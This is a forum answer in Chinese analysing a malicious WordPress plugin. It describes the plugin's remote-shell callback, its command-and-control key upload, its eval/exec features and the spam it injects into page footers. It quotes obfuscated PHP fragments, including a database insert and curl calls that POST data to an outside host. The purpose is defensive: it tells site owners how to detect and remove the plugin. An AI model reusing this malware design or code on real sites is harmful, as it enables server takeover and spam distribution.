根据这个论坛帖子 http://www.webhostingtalk.com/showthread.php?t=1345350:
基本上,它是一个远程 shell 回调,使用公钥加密仅允许黑客在您的服务器上运行代码。它生成一个每次安装的 RSA 密钥对,使用嵌入式密钥将其上传到命令服务器(它有一个预先设定的列表,但可以从其他受感染的主机动态更新以避免被关闭),并通过列表发送功能(启用 eval/exec、服务器信息)并将其通过电子邮件发送到文件中找到的电子邮件列表。
它使用 Wordpress 的配置系统来存储数据,因此请在数据库中查看名为 WP_CLIENT_KEY 的设置键,它看起来像一堆乱码。
一旦激活,该漏洞将获取一系列命令在服务器上进行评估 - 可能是更多 shell 或漏洞,并将字符串注入页脚。这些字符串可能是黑帽 SEO 垃圾邮件,但它还注入了与其联系的命令和控制服务器列表 - 因此任何其他受感染的网站将使用您的服务器来查找其他网站。
正如我在评论中指出的,该脚本将更新数据并将其存储在 WP 数据库中:
$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...
正如论坛帖子指出的那样,这是供脚本自己访问的。该脚本还通过shell POST要求:
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}
无论脚本的确切目的如何,您都应该删除它的所有引用,并且尝试完全摆脱脚本 http://www.malwareremovalservice.com/sneaky-social-png-friend-contains-malware/.
